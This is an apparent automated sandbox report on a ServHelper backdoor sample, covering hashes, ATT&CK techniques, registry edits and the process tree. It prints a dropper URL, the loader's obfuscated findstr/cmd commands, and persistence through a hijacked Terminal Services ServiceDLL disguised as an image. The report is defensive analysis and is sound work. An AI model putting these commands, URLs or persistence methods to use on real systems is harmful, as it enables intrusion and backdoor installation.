servhelper | 0b1fbc02322659bf31999e38a60f832b9ff7a10f0d4866e026deef43ce963942

Analysis

max time kernel
103s
max time network
105s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12-10-2024 22:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe
Size

7.3MB
MD5

3c657b42330d1a7ddf6242024474fbef
SHA1

d19ca0d611db42996dc850a1bb8ce3dead8994ee
SHA256

0b1fbc02322659bf31999e38a60f832b9ff7a10f0d4866e026deef43ce963942
SHA512

caa942525e80f5ed579654eb51e58d6b6ce8c03f357d53e03b14a0e5082d940f41075adaccba09853b5fabdee3756df62d4350ca4cd2e7093bd982ea01e2b68e
SSDEEP

196608:5pqzDlif2GFRwd83gu5Bcl9tXyH/APnRxJY7DvtzLEu4i67b2A9tP:504FR0OgcBgaIPnRxJY7DVzLl4i6n2I5

Score

10^/10

servhelper backdoor defense_evasion discovery execution exploit lateral_movement persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 6 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
lateral_movement

RDP Hijacking
T1563.002

Processes:

cmd.exenet.exenet1.execmd.exenet.exenet1.exe

pid process

1940 cmd.exe
184 net.exe
2928 net1.exe
1356 cmd.exe
960 net.exe
404 net1.exe
Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow pid process

37 364 powershell.exe
39 364 powershell.exe
41 364 powershell.exe
43 364 powershell.exe
47 364 powershell.exe
49 364 powershell.exe
51 364 powershell.exe
Indicator Removal: Network Share Connection Removal 1 TTPs 3 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
defense_evasion

Network Share Connection Removal
T1070.005

Processes:

cmd.exenet.exenet1.exe

pid process

1376 cmd.exe
1492 net.exe
3028 net1.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exe

pid process

3332 icacls.exe
4196 icacls.exe
1392 icacls.exe
2464 icacls.exe
2016 takeown.exe
4944 icacls.exe
4532 icacls.exe
2960 icacls.exe

pid	process
1940	cmd.exe
184	net.exe
2928	net1.exe
1356	cmd.exe
960	net.exe
404	net1.exe

flow	pid	process
37	364	powershell.exe
39	364	powershell.exe
41	364	powershell.exe
43	364	powershell.exe
47	364	powershell.exe
49	364	powershell.exe
51	364	powershell.exe

pid	process
1376	cmd.exe
1492	net.exe
3028	net1.exe

pid	process
3332	icacls.exe
4196	icacls.exe
1392	icacls.exe
2464	icacls.exe
2016	takeown.exe
4944	icacls.exe
4532	icacls.exe
2960	icacls.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

4968 powershell.exe
Executes dropped EXE 3 IoCs

Processes:

Mare.exe.comMare.exe.comMare.exe.com

pid process

1572 Mare.exe.com
3208 Mare.exe.com
3516 Mare.exe.com
Loads dropped DLL 2 IoCs

Processes:

pid process

2788
2788
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2464 icacls.exe
2016 takeown.exe
4944 icacls.exe
4532 icacls.exe
2960 icacls.exe
3332 icacls.exe
4196 icacls.exe
1392 icacls.exe
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

37 raw.githubusercontent.com
36 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

Mare.exe.com

description pid process target process

PID 3208 set thread context of 3516 3208 Mare.exe.com Mare.exe.com

pid	process
1572	Mare.exe.com
3208	Mare.exe.com
3516	Mare.exe.com

pid	process
2788
2788

pid	process
2464	icacls.exe
2016	takeown.exe
4944	icacls.exe
4532	icacls.exe
2960	icacls.exe
3332	icacls.exe
4196	icacls.exe
1392	icacls.exe

flow	ioc
37	raw.githubusercontent.com
36	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

description	pid	process	target process
PID 3208 set thread context of 3516	3208	Mare.exe.com	Mare.exe.com

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_2dkg4ohm.rkw.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC08D.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC0BE.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC09E.tmp	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC0DE.tmp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ng1kyvsw.mp2.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC07C.tmp	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

4816 powershell.exe
548 powershell.exe
2428 powershell.exe
364 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

pid	process
4816	powershell.exe
548	powershell.exe
2428	powershell.exe
364	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.execmd.execmd.exefindstr.exePING.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

PING.EXE

pid process

1888 PING.EXE
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

4344 WMIC.exe

pid	process
1888	PING.EXE

pid	process
4344	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones,"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2028 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1888 PING.EXE

pid	process
2028	reg.exe

pid	process
1888	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	39	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	41	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4968	powershell.exe
4968	powershell.exe
4816	powershell.exe
4816	powershell.exe
548	powershell.exe
548	powershell.exe
2428	powershell.exe
2428	powershell.exe
4968	powershell.exe
4968	powershell.exe
4968	powershell.exe
364	powershell.exe
364	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

660
660

pid	process
660
660

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

Mare.exe.compowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3516	Mare.exe.com
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeDebugPrivilege	4816	powershell.exe
Token: SeDebugPrivilege	548	powershell.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeRestorePrivilege	4532	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	4344	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4344	WMIC.exe
Token: SeAuditPrivilege	4344	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4344	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4344	WMIC.exe
Token: SeAuditPrivilege	4344	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4092	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4092	WMIC.exe
Token: SeAuditPrivilege	4092	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4092	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4092	WMIC.exe
Token: SeAuditPrivilege	4092	WMIC.exe
Token: SeDebugPrivilege	364	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.execmd.execmd.exeMare.exe.comMare.exe.comMare.exe.compowershell.execsc.exenet.execmd.exe

description	pid	process	target process
PID 4116 wrote to memory of 1096	4116	3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe	dllhost.exe
PID 4116 wrote to memory of 1096	4116	3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe	dllhost.exe
PID 4116 wrote to memory of 1096	4116	3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe	dllhost.exe
PID 4116 wrote to memory of 1168	4116	3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe	cmd.exe
PID 4116 wrote to memory of 1168	4116	3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe	cmd.exe
PID 4116 wrote to memory of 1168	4116	3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe	cmd.exe
PID 1168 wrote to memory of 2312	1168	cmd.exe	cmd.exe
PID 1168 wrote to memory of 2312	1168	cmd.exe	cmd.exe
PID 1168 wrote to memory of 2312	1168	cmd.exe	cmd.exe
PID 2312 wrote to memory of 2388	2312	cmd.exe	findstr.exe
PID 2312 wrote to memory of 2388	2312	cmd.exe	findstr.exe
PID 2312 wrote to memory of 2388	2312	cmd.exe	findstr.exe
PID 2312 wrote to memory of 1572	2312	cmd.exe	Mare.exe.com
PID 2312 wrote to memory of 1572	2312	cmd.exe	Mare.exe.com
PID 2312 wrote to memory of 1888	2312	cmd.exe	PING.EXE
PID 2312 wrote to memory of 1888	2312	cmd.exe	PING.EXE
PID 2312 wrote to memory of 1888	2312	cmd.exe	PING.EXE
PID 1572 wrote to memory of 3208	1572	Mare.exe.com	Mare.exe.com
PID 1572 wrote to memory of 3208	1572	Mare.exe.com	Mare.exe.com
PID 3208 wrote to memory of 3516	3208	Mare.exe.com	Mare.exe.com
PID 3208 wrote to memory of 3516	3208	Mare.exe.com	Mare.exe.com
PID 3208 wrote to memory of 3516	3208	Mare.exe.com	Mare.exe.com
PID 3208 wrote to memory of 3516	3208	Mare.exe.com	Mare.exe.com
PID 3516 wrote to memory of 4968	3516	Mare.exe.com	powershell.exe
PID 3516 wrote to memory of 4968	3516	Mare.exe.com	powershell.exe
PID 4968 wrote to memory of 2728	4968	powershell.exe	csc.exe
PID 4968 wrote to memory of 2728	4968	powershell.exe	csc.exe
PID 2728 wrote to memory of 4700	2728	csc.exe	cvtres.exe
PID 2728 wrote to memory of 4700	2728	csc.exe	cvtres.exe
PID 4968 wrote to memory of 4816	4968	powershell.exe	powershell.exe
PID 4968 wrote to memory of 4816	4968	powershell.exe	powershell.exe
PID 4968 wrote to memory of 548	4968	powershell.exe	powershell.exe
PID 4968 wrote to memory of 548	4968	powershell.exe	powershell.exe
PID 4968 wrote to memory of 2428	4968	powershell.exe	powershell.exe
PID 4968 wrote to memory of 2428	4968	powershell.exe	powershell.exe
PID 4968 wrote to memory of 2016	4968	powershell.exe	takeown.exe
PID 4968 wrote to memory of 2016	4968	powershell.exe	takeown.exe
PID 4968 wrote to memory of 4944	4968	powershell.exe	icacls.exe
PID 4968 wrote to memory of 4944	4968	powershell.exe	icacls.exe
PID 4968 wrote to memory of 4532	4968	powershell.exe	icacls.exe
PID 4968 wrote to memory of 4532	4968	powershell.exe	icacls.exe
PID 4968 wrote to memory of 2960	4968	powershell.exe	icacls.exe
PID 4968 wrote to memory of 2960	4968	powershell.exe	icacls.exe
PID 4968 wrote to memory of 3332	4968	powershell.exe	icacls.exe
PID 4968 wrote to memory of 3332	4968	powershell.exe	icacls.exe
PID 4968 wrote to memory of 4196	4968	powershell.exe	icacls.exe
PID 4968 wrote to memory of 4196	4968	powershell.exe	icacls.exe
PID 4968 wrote to memory of 1392	4968	powershell.exe	icacls.exe
PID 4968 wrote to memory of 1392	4968	powershell.exe	icacls.exe
PID 4968 wrote to memory of 2464	4968	powershell.exe	icacls.exe
PID 4968 wrote to memory of 2464	4968	powershell.exe	icacls.exe
PID 4968 wrote to memory of 4824	4968	powershell.exe	reg.exe
PID 4968 wrote to memory of 4824	4968	powershell.exe	reg.exe
PID 4968 wrote to memory of 2028	4968	powershell.exe	reg.exe
PID 4968 wrote to memory of 2028	4968	powershell.exe	reg.exe
PID 4968 wrote to memory of 4808	4968	powershell.exe	reg.exe
PID 4968 wrote to memory of 4808	4968	powershell.exe	reg.exe
PID 4968 wrote to memory of 212	4968	powershell.exe	net.exe
PID 4968 wrote to memory of 212	4968	powershell.exe	net.exe
PID 212 wrote to memory of 3992	212	net.exe	net1.exe
PID 212 wrote to memory of 3992	212	net.exe	net1.exe
PID 4968 wrote to memory of 2880	4968	powershell.exe	cmd.exe
PID 4968 wrote to memory of 2880	4968	powershell.exe	cmd.exe
PID 2880 wrote to memory of 3508	2880	cmd.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\3c657b42330d1a7ddf6242024474fbef_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4116
- C:\Windows\SysWOW64\dllhost.exe
  "C:\Windows\System32\dllhost.exe"
  2⤵
  PID:1096
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cmd < Ali.xll
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1168
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2312
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^tTebyXGrtWfVarBpEGlherBKqJHGOsThNvZFBpPELbywUiTPDmBLMMxqasvcdqfNrwoWrWIcRFBEYmPSQRegPiBwwZjpMzhLoaYTZWLHQuUulP$" Vai.xll
      4⤵
      System Location Discovery: System Language Discovery
      PID:2388
  - - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mare.exe.com
      Mare.exe.com q
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1572
    - - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mare.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mare.exe.com q
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3208
